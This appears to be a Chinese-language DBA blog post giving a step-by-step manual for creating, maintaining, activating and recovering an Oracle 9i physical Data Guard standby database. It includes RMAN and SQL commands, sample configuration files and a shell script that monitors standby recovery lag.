Wrote file /tmp/myvar.sql

sid:10 serial:7 pid:11 spid:12691

 

[oracle@chen ~]$ strace -p 12691 -o 12691.log &

[3] 12693

 

@>alter system archive log current;

System altered.

 

Physical Data Guard创建及恢复

Filed under: Oracle — Yaping @ 4:25 am
Tags:

准备1

案例一2

案例二3

案例三4

维护7

激活Data Guard Database. 7

通过RESETLOGS的恢复8

附件A11

附件B12

参考文档:13

 

 

 

该文档是布置完standby后为客户写的参考手册,所有测试是在9204/Linux上完成,RMAN备份未使用catalog。该测试用的Data Guard是最简单的类型,与full backup recovery的Database无本质区别。

准备

注:该部分主要针对用于案例一

l         Primary Database设为archive log mode

SQL>alter system set log_archive_dest_1='location=/u01/oradata/prod/archive';

SQL>alter system set log_archive_start=true;

SQL>startup mount force

SQL>alter database archivelog;

SQL>alter database open;

 

l         Primary Database 设为 FORCE LOGGING

SQL>alter database force logging;

 

l         Primary SiteData Guard Site设置tnsnames.ora文件,见附件A

 

l         设置初始化参数

修改Primary Database的初始化参数文件,然后scpData Guard Site

 

以下参数是在Primary Database上的:

log_archive_dest_1='location=/u01/oradata/prod/archive'

log_archive_dest_2='location=/nfs/oradata/prod/archive'

log_archive_dest_3=’service=prod_stby’

standby_file_management=auto

 

Primary Site上创建pfile,并把它scpData Guard Site

 

Data Guard Database修改以下参数:

#log_archive_dest_2='location=/nfs/oradata/prod/archive'

# log_archive_dest_3=’service=prod_stby’

standby_archive_dest=/u01/oradata/prod/archive

fal_client=prod_stby

fal_server=prod_prim

 

注:fal_client、fal_server配置在standby端。fal_server对应的service name在standby的tnsnames.ora里,fal_client对应的service name在primary的tnsnames.ora里。

 

l         Primary Site创建Data Guard的控制文件, scpData Guard Site

SQL>alter database create standby controlfile as ‘/tmp/stby.ctl’;

 

l         Data Guard Site创建password file

$orapwd file=orapwprod password=sys_user_password entries=5;

 

l         Primary Site上最近的日常全备份的数据文件scpData Guard Site上。

 

l         Data Guard Site上创建必要的文件目录。

 

案例一

说明:这里讨论的是采用RMAN备份的资料来创建Data Guard DatabasePrimary/Data Guard Site在不同的服务器上,并且文件目录结构一致。

 

l         打开Data Guard Database实例:

SQL>startup nomount

 

l         连接rman,创建Data Guard Database,这里采用了restore后进行recover

的方式,文件路径与Primary Database一致:

 

$rman target sys/sys_user_password@prod_prim auxiliary /

RMAN>run {

  allocate auxiliary channel aux1 device type disk;

  allocate auxiliary channel aux2 device type disk;

  duplicate target database for standby nofilenamecheck dorecover;

}

 

如果在该过程中出现下面的错误,请在Primary Database归档并备份当前日志文件,并scpData Guard Site

RMAN-05507: standby controlfile checkpoint (5965178905648) is more recent than duplication point in time (5965178904203)

 

如果该过程没有显示错误信息,说明Data Guard Database已经成功创建了。

 

 

案例

说明:Primary DatabaseData Guard Database在同一台服务器,参数的设置稍有些不一样。

 

l         假设在Primary/Data Guard的文件目录结构如下:

 

Primary

Data Guard

Datafile

/u/oradata/chen/db

/u/oradata/chen/stby

Redo log

/u/oradata/chen/db

/u/oradata/chen/stby

Control file

/u/oradata/chen/db

/u/oradata/chen/stby

Backup directory

/u/backup/chen

/u/backup/chen

 

l         初始化参数文件:

Primary Database spfilechen.ora

*.log_archive_dest_1=’LOCATION=/u/oradata/chen/arch’

*.log_archive_dest_2=’service=chen_stby dependency=log_archive_dest_1 optional’

*.standby_file_management=’AUTO’

 

Data Guard Databse inittest.ora

*.db_file_name_convert=’/u/oradata/chen/db/’,’/u/oradata/chen/stby/’

*.fal_client=’CHEN_STBY’

*.fal_server=’CHEN_PRIM’

*.instance_name=’test’

*.lock_name_space=’test’

*.log_archive_dest_1=’LOCATION=/u/oradata/chen/arch’

*.log_file_name_convert=’/u/oradata/chen/db/’,’/u/oradata/chen/stby/’

*.standby_archive_dest=’/u/oradata/chen/arch’

 

说明:Primary Database初始化参数log_archive_dest_2使用了dependency属性,因此不必为Data Guard再生成一份归档日志文件,相应地,在Data Guard Databaselog_archive_dest_1standby_archive_dest也要设置正确。

 

l         创建Data Guard

$rman target / auxiliary sys/sys_user_password@chen_stby

RMAN>run {

  allocate auxiliary channel aux1 device type disk;

  allocate auxiliary channel aux2 device type disk;

  duplicate target database for standby nofilenamecheck dorecover;

}

 

 

案例

 

说明:下面介绍用RMAN备份,创建Data Guard时不连接Primary Database,并且文件的目录结构与Primary Database不一致。

 

l         假设在Primary/Data Guard的文件目录结构如下:

 

Primary

Data Guard

Datafile

/oradata/prod

/u/oradata/prod

Redo log

/oradata/prod, /opt/app/oracle/oradata/prod

/u/oradata/prod,

/opt/app/oracle/oradata/prod

Control file

/oradata/prod,

/opt/app/oracle/oradata/prod

/u/oradata/prod

/opt/app/oracle/oradata/prod

Backup directory

/u01/backup/prod

/u/backup/prod

 

准备过程与前面的方法一样,以下过程无特别说明,都是在Data Guard Site上处理。

 

l         加载实例

SQL>STARTUP NOMOUNT;

 

l         文件恢复

 

设置DBID

RMAN> SET DBID 2330521740;

 

恢复control file

RMAN> RUN {

ALLOCATE CHANNEL c1 DEVICE TYPE disk;

RESTORE CONTROLFILE FROM ‘/u/backup/prod/controlfile_20060405.bak’;

ALTER DATABASE MOUNT;

}

 

恢复数据文件:

SQL>declare
  devtype varchar2(256);
  done    boolean;
begin
  -- Allocate a disk channel for this session (empty type string => DISK).
  devtype := sys.dbms_backup_restore.deviceallocate(type => '', ident => 't1');
  -- Begin a datafile restore conversation.
  sys.dbms_backup_restore.restoresetdatafile;
  -- Map each datafile number contained in this backup piece to its new path
  -- on the standby (directory structure differs from the primary).
  sys.dbms_backup_restore.restoredatafileto(dfnumber => 03, toname => '/u/oradata/prod/drsys01.dbf');
  sys.dbms_backup_restore.restoredatafileto(dfnumber => 05, toname => '/u/oradata/prod/tools01.dbf');
  sys.dbms_backup_restore.restoredatafileto(dfnumber => 06, toname => '/u/oradata/prod/users01.dbf');
  sys.dbms_backup_restore.restoredatafileto(dfnumber => 08, toname => '/u/oradata/prod/statspack01.dbf');
  -- Extract the mapped datafiles from the backup piece.
  sys.dbms_backup_restore.restorebackuppiece(done => done, handle => '/u/backup/prod/db_20060405_342_1_586985480', params => null);
  sys.dbms_backup_restore.devicedeallocate;
end;
/

 

SQL>declare
  devtype varchar2(256);
  done    boolean;
begin
  -- Allocate a disk channel for this session (empty type string => DISK).
  devtype := sys.dbms_backup_restore.deviceallocate(type => '', ident => 't1');
  -- Begin a datafile restore conversation.
  sys.dbms_backup_restore.restoresetdatafile;
  -- Map each datafile number contained in this backup piece to its new path.
  sys.dbms_backup_restore.restoredatafileto(dfnumber => 01, toname => '/u/oradata/prod/system01.dbf');
  sys.dbms_backup_restore.restoredatafileto(dfnumber => 02, toname => '/u/oradata/prod/undotbs01.dbf');
  sys.dbms_backup_restore.restoredatafileto(dfnumber => 04, toname => '/u/oradata/prod/indx01.dbf');
  sys.dbms_backup_restore.restoredatafileto(dfnumber => 07, toname => '/u/oradata/prod/xdb01.dbf');
  -- Extract the mapped datafiles from the backup piece.
  sys.dbms_backup_restore.restorebackuppiece(done => done, handle => '/u/backup/prod/db_20060405_343_1_586985480', params => null);
  sys.dbms_backup_restore.devicedeallocate;
end;
/

 

dbms_backup_restore的说明可以参考$ORACLE_HOME/rdbms/admin/dbmsbkrs.sqlprvtbkrs.plb文件。

恢复文件时,单独处理每个备份片,否者可能会报备份里没有要恢复的文件的错误。可以通过备份的日志文件或者连接RMAN,用下面命令来获取每个备份片里对应的文件:

RMAN>list backup of database;

 

恢复archived log files

SQL>declare
  devtype varchar2(256);
  done    boolean;
begin
  -- Allocate a disk channel for this session (empty type string => DISK).
  devtype := sys.dbms_backup_restore.deviceallocate(type => '', ident => 't1');
  -- Restore archived logs into the standby's archive destination.
  sys.dbms_backup_restore.restoresetarchivedlog(destination => '/u/oradata/prod/arch');
  -- Restore every archived log in the piece starting from SCN 415.
  sys.dbms_backup_restore.restoreArchivedLogRange(low_change => 415);
  sys.dbms_backup_restore.restorebackuppiece(done => done, handle => '/u/backup/prod/arch_20060405_341_1_586985454', params => null);
  sys.dbms_backup_restore.devicedeallocate;
end;
/

 

可以通过备份的日志文件或者连接RMAN,用下面命令来获取每个备份片具体包含的archived log file

RMAN> list backup of archivelog all/list backup of archivelog from sequence 300;

 

l         文件重命名

alter database rename file ‘/oradata/prod/system01.dbf’ to

‘/u/oradata/prod/system01.dbf’;

alter database rename file ‘/oradata/prod/undotbs01.dbf’ to

‘/u/oradata/prod/undotbs01.dbf’;

alter database rename file ‘/oradata/prod/drsys01.dbf’ to

‘/u/oradata/prod/drsys01.dbf’;

alter database rename file ‘/oradata/prod/indx01.dbf’ to

 ‘/u/oradata/prod/indx01.dbf’;

alter database rename file ‘/oradata/prod/tools01.dbf’ to

‘/u/oradata/prod/tools01.dbf’;

alter database rename file ‘/oradata/prod/users01.dbf’ to

‘/u/oradata/prod/users01.dbf’;

alter database rename file ‘/oradata/prod/xdb01.dbf’ to

‘/u/oradata/prod/xdb01.dbf’;

alter database rename file ‘/oradata/prod/statspack01.dbf’ to

‘/u/oradata/prod/statspack01.dbf’;

 

l         Recover database

RMAN>RECOVER DATABASE UNTIL SEQUENCE 457 thread 1;

 

至此,我们相当于恢复了一个普通的数据库,下面将把该数据库设成Data Guard Database

Primary Database上生成standby control file,替换掉Data Guard Sitecontrol file

 

Data Guard Database的初始化参数里增加下面参数:

db_file_name_convert=’/oradata/prod/’,’/u/oradata/prod/’

log_file_name_convert='/oradata/prod/','/u/oradata/prod/'

 

加载Data Guard Database

SQL>startup nomount

SQL>alter database mount standby database;

SQL> alter database recover automatic standby database;

 

 

维护

l         加载数据库:

SQL>startup nomount;

SQL>alter database mount standby database;

 

l         打开/取消Data Guard Databasemanaged recovery

SQL>alter database recover managed standby database disconnect from session;

SQL>alter database recover managed standby database cancel;

 

l         只读打开,并增加临时文件,如果处于恢复模式,则先取消恢复:

SQL>alter database open read only;

 

SQL>alter tablespace temp add tempfile ‘/oradata/prod/temp01.dbf’ size 1025m;

SQL>alter tablespace temp add tempfile ‘/oradata/prod/temp02.dbf’ size 1025m;

 

注:在目前版本,physical standby 不支持分布式查询。

激活Data Guard Database

有几种方法可以把Data Guard Database变成Primary Database,在激活Data Guard Database时,只要有可能,就应该避免数据丢失。

 

l         通过发布ACTIVATE命令激活:

该方法激活Data Guard Database后,需要resetlog,是最方便的,激活后要尽快做个备份。如果可能的话,归档所有的Primary Database redo log,并在Data Guard Database上恢复。

 

SQL>startup nomount

SQL>alter database mount standby database;

SQL>alter database activate standby database;

 

l         通过重新创建控制文件来激活:

如果Primary Database出现故障,存在无法被归档的redo log资料,并且那些未被归档的redo log文件没有被破坏,可以考虑该方法,能够做到资料不丢失。与ACTIVATE相比,该方法应是首选。

 

1  Primary Databaseredo log拷贝到Data Guard Siteredo log目录上;

 

2  Data Guard Database上:

alter database backup controlfile to trace;

取出创建controlfile sql,使用NORESETLOGS

 

3         创建新的控制文件。

 

4         recover database

 

5         打开数据库。

 

l         Primary DatabaseData Guard Database进行角色互换,这种方法一般在计划的维护中用到,在做角色转换时要保证网络稳定,否则可能出现问题需要手工解决。

如果计划的时间比较紧,可以考虑如下处理(在primary site):

1          switch redo log

2          issue checkpoint

3          stop listener

4          startup force

5          switchover

6          start listener

 

激活Data Guard Database后,如果没有添加临时数据文件的,需要添加临时数据文件。

 

 

通过RESETLOGS的恢复

采用case 2创建的Data Guard做测试,在激活该Data Guard后,在里面创建新的数据库对象,数据文件。

通过resetlogs恢复的关键是:

l         拥有RESETLOGS前后的控制文件,可以是备份的控制文件;

l         知道RESETLOGSSCN

l         RESETLOGS前的数据库备份文件;

l         恢复时必要的archived logs

 

l         准备:

获取RESETLOGSSCN

可以通过几种方法来获取该SCN

l         查询v$database

SQL>col RESETLOGS_CHANGE# format 9999999999999

SQL>select RESETLOGS_CHANGE# from v$database;

RESETLOGS_CHANGE#

—————–

5965186246274

 

l         通过RMAN列出

RMAN> list incarnation of database;

using target database controlfile instead of recovery catalog

List of Database Incarnations

DB Key  Inc Key DB Name  DB ID            CUR Reset SCN  Reset Time

——- ——- ——– —————- — ———- ———-

1       1       PROD 2330521740       NO  1          29-DEC-05

2       2       PROD 2330521740       YES 5965186246274 08-APR-06

 

l         dump出控制文件/system文件

SQL>alter session set events ‘immediate trace name controlf level 3’;

dump文件的DATABASE ENTRY部分,有如下内容:

Incmplt recovery scn: 0x0000.00000000

Resetlogs scn: 0x056c.e0cea682 Resetlogs Timestamp  04/08/2006 13:32:47

Prior resetlogs scn: 0x0000.00000001 Prior resetlogs Timestamp  12/29/2005 14:45:32

 

转换一下:

Hex(0x056c.e0cea682) = Dec(5965186246274)

 

l         通过查看alert_SID.log文件

ALTER DATABASE ACTIVATE [PHYSICAL] STANDBY DATABASE

RESETLOGS after incomplete recovery UNTIL CHANGE 5965186246273

Resetting resetlogs activation ID 2330494092 (0x8ae8848c)

 

注意:通过前三种方法获取的SCN都比从alert_SID.log中获得的SCN大1,在alert_SID.log里的SCN才是真实的,因此通过前三种方法获得的SCN需要减去1。

 

l         模拟一些事务:

创建了两个表空间和用户chen,并在chen里创建了几个表。

SQL>create tablespace test datafile ‘/u/oradata/prod/test01.dbf’ size 129m uniform size 1m;

SQL>create tablespace data datafile ‘/u/oradata/prod/data01.dbf’ size 257m uniform size 1m;

SQL>create user chen identified by chen default tablespace users temporary tablespace temp;

SQL>grant create session,create table to chen;

SQL>alter user chen quota unlimited on users;

SQL>alter user chen quota unlimited on test;

SQL>alter user chen quota unlimited on data;

chen里创建表,加载数据。

 

SQL>select table_name,tablespace_name from user_tables;

TABLE_NAME                     TABLESPACE_NAME

—————————— ——————————

T1                             USERS

T2                             USERS

T3                             TEST

T4                             USERS

T5                             DATA

 

SQL>@filelist.sql

Datafiles info:

 

TABLESPACE_NAME  FILE_NAME                                          TOTAL    FREE     USED     PCT_FREE   MAX_BLKS STATUS     AUT

—————- ————————————————– ——– ——– ——– ———- ——– ———- —

DATA             /u/oradata/prod/data01.dbf                     257      170      87       66.15      21760    AVAILABLE  NO

TEST             /u/oradata/prod/test01.dbf                     129      42       87       32.56      5376     AVAILABLE  NO

USERS            /u/oradata/prod/users01.dbf                    1000     482      518      48.2       61688    AVAILABLE  YES

。。。。。。

 

Tempfiles info:

 

TABLESPACE_NAME  FILE_NAME                                          TOTAL    FREE     USED     PCT_FREE   MAX_BLKS STATUS     AUT

—————- ————————————————– ——– ——– ——– ———- ——– ———- —

TEMP             /u/oradata/prod/temp01.dbf                     513      513      0        100                 AVAILABLE  NO

 

Controlfiles info:

 

FILE_NAME

————————————————–

/u/oradata/prod/control01.ctl

/u/oradata/prod/control02.ctl

 

Redo log info:

THREAD# GROUP#  KBYTES    ARCH    STATUS      SEQ#      TYPE    MEMBER                                  PCT_USED

1       1       102400    YES     INACTIVE    11        ONLINE  /u/oradata/prod/redo01_a.log

1       2       102400    YES     INACTIVE    10        ONLINE  /u/oradata/prod/redo02_a.log

1       3       102400    NO      CURRENT     12        ONLINE  /u/oradata/prod/redo03_a.log        89.54%

 

当前的redo log已经写了89.54%的内容了。

 

SQL>shutdown abort

 

保存一下现有的control file, redo log

 

l         恢复:

RESETLOGS前的恢复

这部分恢复与case 2的前面过程差不多,参照case 2。在数据文件restore后,发布如下命令:

SQL>recover database until change 5965186246273 using backup controlfile;

 

这个执行完后,关闭数据库,把前面备份的在RESETLOGS后的control fileredo log恢复到对应的位置。

 

RESETLOGS后的恢复:

 

SQL>startup mount

SQL>recover database;

将提示如下错误:

ORA-01110: data file 9: ‘/u/oradata/prod/test01.dbf’

ORA-01157: cannot identify/lock data file 9 – see DBWR trace file

ORA-01110: data file 9: ‘/u/oradata/prod/test01.dbf’

 

这是因为后来创建的数据文件,当前的控制文件里有该文件信息,而在磁盘上没有的缘故,因为创建该文件后的archived log都存在,可以从archived log里恢复出来,现在把该文件建起来:

SQL>alter database create datafile ‘/u/oradata/prod/test01.dbf’ as

‘/u/oradata/prod/test01.dbf’;

SQL>alter database create datafile ‘/u/oradata/prod/data01.dbf’ as

‘/u/oradata/prod/data01.dbf’;

 

SQL> recover database;

SQL>alter database open;

 

至此,恢复完成了,可以检查一下数据是否完整。

附件A

 

Standby site tnsnames.ora

prod_prim =

  (DESCRIPTION =

    (ADDRESS_LIST =

      (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.8.9)(PORT = 1521))

    )

    (CONNECT_DATA =

      (SID = prod)

    )

  )

 

Primary site tnsnames.ora

prod_stby = (DESCRIPTION_LIST =

          (DESCRIPTION=

             (ADDRESS_LIST=

              (ADDRESS=(PROTOCOL=tcp) (HOST=192.168.8.119) (PORT=1521))

)

             (CONNECT_DATA=(SID=prod))

           )

)

 

 

附件B

检查Standby DB恢复。主库半小时切换一次日志,redo log size 50M,传输速率约200kB/s,考虑到远程传输日志及恢复时间,假设Standby DB40分钟内恢复是正常的。

check_stby_recovery.sh

#!/bin/bash
# check_stby_recovery.sh -- alert when the standby's archived-log apply lags.
# The primary switches logs about every 30 minutes (50 MB redo, ~200 kB/s
# transfer), so a standby more than TIME_LAG seconds behind is delayed.

cd `dirname $0`/..
. conf/define

TIME_LAG=2400          # acceptable apply delay, seconds (40 minutes)
RESENDLAG=1800         # minimum seconds between repeat error notifications
RESENDTIMES=3          # maximum number of repeat error notifications
SQLPLUS=${ORACLE_HOME}/bin/sqlplus
SPOOLLOG=${BASEDIR}/spool/stb_rcv.log
TMPLOG=${BASEDIR}/spool/stb.${ORACLE_SID}

# Spool a '#'-prefixed row when the newest archived log completed more than
# TIME_LAG seconds ago; an empty spool means the standby is keeping up.
RES=`${SQLPLUS} -s /nolog <<EOF
conn / as sysdba
set feedback off
set termout  off
set pagesize 0
set line 130
col seq format a10
spool ${SPOOLLOG}
select '#'||SEQUENCE# seq,'#'||REGISTRAR,'#'||APPLIED,'#'||to_char(COMPLETION_TIME,'yyyy/mm/dd hh24:mi:ss')||'         #'||trunc((sysdate-COMPLETION_TIME)*1440) from v\\$archived_log where SEQUENCE# = (select max(SEQUENCE#) from v\\$archived_log) and COMPLETION_TIME < sysdate - ${TIME_LAG}/86400;
spool off
exit
EOF`

# Any ORA- error in the sqlplus output: mail an alert, but throttle repeats
# to at most RESENDTIMES notifications spaced at least RESENDLAG seconds.
# TMPLOG stores "send_count:last_send_epoch" for the throttle state.
ERRCNT=`echo ${RES}|grep -c ORA-`
if [ ${ERRCNT} -gt 0 ] ; then
   NOW=`date +%s`
   if [ ! -f $TMPLOG ]; then
      # First failure: record state and send the initial alert.
      echo "1:$NOW" > $TMPLOG
      /bin/echo ${RES}|/usr/bin/email -s "Data Guard ${ORACLE_SID} on `hostname` may have problems, pls check." ${MAILTO}
   else
      LASTSEND=`tail -1 $TMPLOG|cut -d: -f1`
      LASTTIME=`tail -1 $TMPLOG|cut -d: -f2`
      if [ $LASTSEND -ge $RESENDTIMES ]; then
         # Already sent the maximum number of reminders; stay quiet.
         exit
      else
         LAG=`expr $NOW - $LASTTIME`
         if [ $LAG -ge $RESENDLAG ]; then
              LASTSEND=`expr $LASTSEND + 1`
              echo "$LASTSEND:$NOW" >> $TMPLOG
              /bin/echo ${RES}|/usr/bin/email -s "Data Guard ${ORACLE_SID} on `hostname` may have problems, pls check." ${MAILTO}
              exit
         fi
      fi
   fi
else
   # Query succeeded: clear any pending error-notification state.
   if [ -f $TMPLOG ]; then
      rm -f $TMPLOG
   fi
fi

# A spooled '#' row means recovery is delayed beyond TIME_LAG -- notify.
CNT=`/bin/grep -c "#" ${SPOOLLOG}`
if [ ${CNT} -gt 0 ] ; then
   /bin/cat ${SPOOLLOG}|/usr/bin/email -s "Data Guard ${ORACLE_SID} on `hostname` recovery delay, pls check!" ${MAILTO}
fi

 

参考文档:

Oracle8i备份与恢复手册

Oracle® Data Guard —— Concepts and Administration

Oracle9i Recovery Manger User’s Guide

Oracle 9i RMAN备份与恢复技术——配置和使用Oracle恢复管理器

 

« Previous PageNext Page »

Create a free website or blog at WordPress.com.